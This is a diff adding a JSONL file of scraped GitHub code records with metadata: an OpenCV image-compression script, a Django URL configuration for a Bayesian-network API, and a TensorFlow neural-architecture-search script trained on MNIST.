diff --git "a/1466.jsonl" "b/1466.jsonl" new file mode 100644--- /dev/null +++ "b/1466.jsonl" @@ -0,0 +1,642 @@ +{"seq_id": "25033867342", "text": "import cv2\nimport os\n\n# function to compress image using above method\ndef compress_image(image_path, quality=10, save_path=None):\n \"\"\"Compress an image to 10% of original size\"\"\"\n image = cv2.imread(image_path)\n # file_name = file_name.split('.')[0] + f'_q{quality}.' + file_name.split('.')[1]\n cv2.imwrite(save_path, image, [int(cv2.IMWRITE_JPEG_QUALITY), quality])\n\nif __name__=='__main__':\n image_path = 'test.png'\n output_path = 'compressed_images/'\n compress_image(image_path, output_path, quality=10)", "repo_name": "ANMOL2212002/Generative-Neural-Network-Based-Image-Compression", "sub_path": "png_to_compressed.py", "file_name": "png_to_compressed.py", "file_ext": "py", "file_size_in_byte": 527, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "cv2.imread", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.IMWRITE_JPEG_QUALITY", "line_number": 9, "usage_type": "attribute"}]} +{"seq_id": "24968868695", "text": "\"\"\"horseid URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.views.generic.base import TemplateView\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom api import views\n\n\n\n\n\n\n\nurlpatterns = [\n\n\n\t#API URLs \t\t\t\t\t\t\t\t\t\t\t\t\tREPONSE FUNCTIONS\n url(r'^admin/', \t\t\t\t\t\t\t\t\t\t\tadmin.site.urls),\n url(r'^variables/', \t\t\t\t\t\t\t\t\t\tviews.VariablesList.as_view()),\n url(r'^is_started/', \t\t\t\t\t\t\t\t\t\tviews.IsStarted.as_view()),\n url(r'^network_data/', \t\t\t\t\t\t\t\t\t\tviews.NetworkData.as_view()),\n url(r'^view_network/', \t\t\t\t\t\t\t\t\t\tviews.ViewNetwork.as_view(), name=\"view_network\"),\n url(r'^update/', \t\t\t\t\t\t\t \t\t\tviews.UpdateAndQuery.as_view()),\n url(r'^model/start/', views.HorseIDBayesianNetworkAPI.start.as_view()),\n url(r'^model/build/',\t\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.build.as_view()),\n url(r'^model/run/',\t\t\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.run.as_view()),\n url(r'^model/update/',\t\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.update.as_view()),\n url(r'^model/initialise_space/',\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.initialise_space.as_view()),\n url(r'^model/set_universe/',\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.set_universe.as_view()),\n url(r'^model/clear_values/',\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.clear_values.as_view()),\n url(r'^model/use_default_values/',\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.use_default_values.as_view()),\n url(r'^model/declare_variables/',\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.declare_variables.as_view()),\n url(r'^model/update_values/',\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.update_values.as_view()),\n url(r'^model/load_sizes/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.load_sizes.as_view()),\n url(r'^model/set_evidences/',\t\t\t\t\t\t\t views.HorseIDBayesianNetworkAPI.set_evidences.as_view()),\n url(r'^model/load_evidences/', views.HorseIDBayesianNetworkAPI.load_evidences.as_view()),\n url(r'^model/set_cpds/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.set_cpds.as_view()),#stop here\n url(r'^model/load_cpds/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.load_cpds.as_view()),\n url(r'^model/load_default_graph/',\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.load_default_graph.as_view()),\n url(r'^model/draw_default_graph/', views.HorseIDBayesianNetworkAPI.draw_default_graph.as_view()),\n url(r'^model/load_graph/', views.HorseIDBayesianNetworkAPI.load_graph.as_view()),\n url(r'^model/draw_graph/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.draw_graph.as_view()),\n url(r'^model/build_model/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.build_model.as_view()),\n url(r'^model/load_cpds_to_model/',\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.load_cpds_to_model.as_view()),\n url(r'^model/load_model/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.load_model.as_view()),\n url(r'^model/train_model/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.train_model.as_view()),\n url(r'^model/update_model/',\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.update_model.as_view()),\n url(r'^model/test_model/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.test_model.as_view()),\n url(r'^model/describe_node/',\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.describe_node.as_view()),\n url(r'^model/check_model/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.check_model.as_view()),\n 
url(r'^model/get_edges/', views.HorseIDBayesianNetworkAPI.get_edges.as_view()),\n url(r'^model/get_nodes/', views.HorseIDBayesianNetworkAPI.get_nodes.as_view()),\n url(r'^model/get_cpds/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.get_cpds.as_view()),\n \turl(r'^model/get_cardinality/',\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.get_cardinality.as_view()),\n \turl(r'^model/get_local_independencies/',\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.get_local_independencies.as_view()),\n \turl(r'^model/get_active_trail_nodes/',\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.get_active_trail_nodes.as_view()),\n \turl(r'^model/query/',\t\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.query.as_view()),\n \turl(r'^model/map_query/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.map_query.as_view()),\n url(r'^model/test_all/', views.HorseIDBayesianNetworkAPI.test_all.as_view()),\n url(r'^$', TemplateView.as_view(template_name=\"index.html\"),name='home'),\n];\n\nurlpatterns = format_suffix_patterns(urlpatterns);\n", "repo_name": "professorbashorun/Bayesian-Learning", "sub_path": "horseid/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 5157, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.conf.urls.url", "line_number": 32, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 32, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 33, "usage_type": "call"}, {"api_name": "api.views.VariablesList.as_view", "line_number": 33, "usage_type": "call"}, {"api_name": "api.views.VariablesList", "line_number": 33, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 33, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 34, "usage_type": "call"}, {"api_name": "api.views.IsStarted.as_view", "line_number": 34, "usage_type": "call"}, {"api_name": "api.views.IsStarted", "line_number": 34, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 34, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 35, "usage_type": "call"}, {"api_name": "api.views.NetworkData.as_view", "line_number": 35, "usage_type": "call"}, {"api_name": "api.views.NetworkData", "line_number": 35, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 35, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 36, "usage_type": "call"}, {"api_name": "api.views.ViewNetwork.as_view", "line_number": 36, "usage_type": "call"}, {"api_name": "api.views.ViewNetwork", "line_number": 36, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 36, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 37, "usage_type": "call"}, {"api_name": "api.views.UpdateAndQuery.as_view", "line_number": 37, "usage_type": "call"}, {"api_name": "api.views.UpdateAndQuery", "line_number": 37, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 37, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 38, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.start.as_view", "line_number": 38, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 38, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 38, "usage_type": "name"}, {"api_name": "django.conf.urls.url", 
"line_number": 39, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.build.as_view", "line_number": 39, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 39, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 39, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 40, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.run.as_view", "line_number": 40, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 40, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 40, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 41, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.update.as_view", "line_number": 41, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 41, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 41, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 42, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.initialise_space.as_view", "line_number": 42, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 42, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 42, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 43, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.set_universe.as_view", "line_number": 43, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 43, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 43, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 44, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.clear_values.as_view", "line_number": 44, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 44, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 44, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 45, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.use_default_values.as_view", "line_number": 45, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 45, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 45, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 46, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.declare_variables.as_view", "line_number": 46, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 46, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 46, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 47, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.update_values.as_view", "line_number": 47, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 47, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 47, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 48, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.load_sizes.as_view", "line_number": 48, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 48, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 48, 
"usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 49, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.set_evidences.as_view", "line_number": 49, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 49, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 49, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 50, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.load_evidences.as_view", "line_number": 50, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 50, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 50, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 51, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.set_cpds.as_view", "line_number": 51, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 51, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 51, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 52, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.load_cpds.as_view", "line_number": 52, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 52, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 52, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 53, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.load_default_graph.as_view", "line_number": 53, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 53, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 53, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 54, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.draw_default_graph.as_view", "line_number": 54, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 54, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 54, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 55, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.load_graph.as_view", "line_number": 55, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 55, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 55, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 56, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.draw_graph.as_view", "line_number": 56, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 56, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 56, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 57, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.build_model.as_view", "line_number": 57, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 57, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 57, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 58, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.load_cpds_to_model.as_view", "line_number": 58, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 58, 
"usage_type": "attribute"}, {"api_name": "api.views", "line_number": 58, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 59, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.load_model.as_view", "line_number": 59, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 59, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 59, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 60, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.train_model.as_view", "line_number": 60, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 60, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 60, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 61, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.update_model.as_view", "line_number": 61, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 61, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 61, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 62, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.test_model.as_view", "line_number": 62, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 62, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 62, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 63, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.describe_node.as_view", "line_number": 63, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 63, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 63, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 64, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.check_model.as_view", "line_number": 64, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 64, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 64, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 65, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.get_edges.as_view", "line_number": 65, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 65, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 65, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 66, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.get_nodes.as_view", "line_number": 66, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 66, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 66, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 67, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.get_cpds.as_view", "line_number": 67, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 67, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 67, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 68, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.get_cardinality.as_view", "line_number": 68, "usage_type": "call"}, {"api_name": 
"api.views.HorseIDBayesianNetworkAPI", "line_number": 68, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 68, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 69, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.get_local_independencies.as_view", "line_number": 69, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 69, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 69, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 70, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.get_active_trail_nodes.as_view", "line_number": 70, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 70, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 70, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 71, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.query.as_view", "line_number": 71, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 71, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 71, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 72, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.map_query.as_view", "line_number": 72, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 72, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 72, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 73, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.test_all.as_view", "line_number": 73, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 73, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 73, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 74, "usage_type": "call"}, {"api_name": "django.views.generic.base.TemplateView.as_view", "line_number": 74, "usage_type": "call"}, {"api_name": "django.views.generic.base.TemplateView", "line_number": 74, "usage_type": "name"}, {"api_name": "rest_framework.urlpatterns.format_suffix_patterns", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "16942511438", "text": "import os\nimport numpy as np\nimport tensorflow as tf\nfrom keras.layers import LSTM\nfrom keras import regularizers\nfrom keras import backend as K\nfrom keras.layers import Embedding\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\ninputdim, timesteps, classes = 11, 10, 11\nmnist = input_data.read_data_sets(\"MNIST_data/\" , one_hot = True)\n\ndef scale_features(hyp):\n for i in range(timesteps):\n hyp[0, i, :] = (hyp[0, i, :] - np.mean(hyp[0, i, :])) / (hyp[0, i, :].max() - hyp[0, i, :].min())\n return hyp \n\ndef father_network():\n father_lr = 7.0\n inp = tf.placeholder(tf.float32, shape=[1, timesteps, inputdim])\n X = LSTM(35, return_sequences=True)(inp)\n X = LSTM(classes, return_sequences=True)(X)\n hyperparams = Dense(classes, activation='softmax', kernel_regularizer=regularizers.l2(0.01))(X) # [1, timesteps, classes]\n outza = tf.cast(tf.convert_to_tensor([tf.argmax(hyperparams[0, i, :]) for i in range(timesteps)]), tf.float32)\n loss = - tf.reduce_mean(tf.log(1e-10 + hyperparams)) - 
tf.square(tf.reduce_mean(outza - tf.reduce_mean(outza)))\n val_accuracy = tf.placeholder_with_default(10.0, shape=())\n \n optimizer = tf.train.RMSPropOptimizer(father_lr)\n gradients = optimizer.compute_gradients(loss=loss)\n for i, (grad, var) in enumerate(gradients):\n if grad is not None:\n gradients[i] = (grad * val_accuracy, var)\n train = optimizer.apply_gradients(gradients)\n \n hidden_layers = [25, 50, 100, 200, 300, 400, 500, 600, 700, 800, 900]\n learning_rates = [0.0001, 0.0006, 0.001, 0.005, 0.01, 0.05, 0.1, 0.5, 1.0, 3.0, 6.0]\n \n hyp = np.random.random((1, timesteps, inputdim)).astype(np.float32)\n with tf.Session() as sess:\n K.set_session(sess)\n sess.run(tf.global_variables_initializer())\n print(\"\\n\\n\")\n for i in range(10000):\n print(\"Controller Epoch # {}\".format(i))\n out = [np.argmax(hyp[0, i, :]) for i in range(timesteps)]\n print(\"{}\\n\\n\".format(out))\n no_hidden, lr = hidden_layers[out[0]], learning_rates[out[1]]\n val_acc = train_network(no_hidden, lr)\n output = \"\\nController Loss : {}\\n\".format(sess.run(loss, feed_dict={inp: hyp}))\n output += \"Accuracy : {}, Learning Rate : {}, Hidden Number : {}\\n\".format(val_acc, lr, no_hidden)\n with open(\"accuracy.log\", \"a+\") as f:\n f.write(output)\n print(output)\n hyp = np.roll(hyp, 1, axis=1)\n hyp = scale_features(hyp)\n _ = sess.run(train, feed_dict = {val_accuracy : val_acc ** 3, inp:hyp})\n hyp = sess.run(hyperparams, feed_dict={inp : hyp})\n # Remove last one and pad the start by 1\n\ndef train_network(no_hidden=600, learning_rate=3.0):\n no_input, no_output = 784, 10\n val_accuracy = 0\n\n x = tf.placeholder(tf.float32 ,shape = [None, no_input])\n y = tf.placeholder(tf.float32 , shape = [None, no_output])\n\n W1 = tf.Variable(tf.random_normal(shape = [no_input, no_hidden])) # Used Theta1'\n W2 = tf.Variable(tf.random_normal(shape = [no_hidden ,no_output]))\n b1 = tf.Variable(tf.random_normal(shape = [1, no_hidden]))\n b2 = tf.Variable(tf.random_normal(shape = [1, no_output]))\n \n h = tf.matmul(tf.nn.sigmoid(tf.matmul(x, W1) + b1), W2) + b2\n\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits = h,labels = y))\n gradient = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)\n\n equal = tf.equal(tf.argmax(y, 1) , tf.argmax(h, 1))\n accuracy = tf.reduce_mean(tf.cast(equal , tf.float32))\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for i in range(700): \n batch_X , batch_Y = mnist.train.next_batch(100)\n loss, _ = sess.run([cost, gradient], feed_dict = {x : batch_X , y : batch_Y})\n print(\"Child Loss : {}\".format(loss), end=\"\\r\")\n val_accuracy = sess.run(accuracy, feed_dict = {x : mnist.validation.images, y : mnist.validation.labels})\n return val_accuracy\n\nif __name__ == '__main__':\n father_network()", "repo_name": "dhruvramani/Neural-Architecture-Search-with-RL", "sub_path": "model_dummy/network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 4242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 42, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data.read_data_sets", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 25, "usage_type": 
"call"}, {"api_name": "tensorflow.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "keras.layers.LSTM", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 27, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.regularizers.l2", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.regularizers", "line_number": 28, "usage_type": "name"}, {"api_name": "tensorflow.cast", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.log", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.square", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.placeholder_with_default", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.train.RMSPropOptimizer", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 33, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.backend.set_session", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 45, "usage_type": "name"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.train.GradientDescentOptimizer", "line_number": 80, "usage_type": 
